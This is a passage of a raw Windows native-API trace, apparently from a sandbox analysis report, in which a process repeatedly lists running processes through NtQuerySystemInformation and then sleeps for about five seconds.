Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 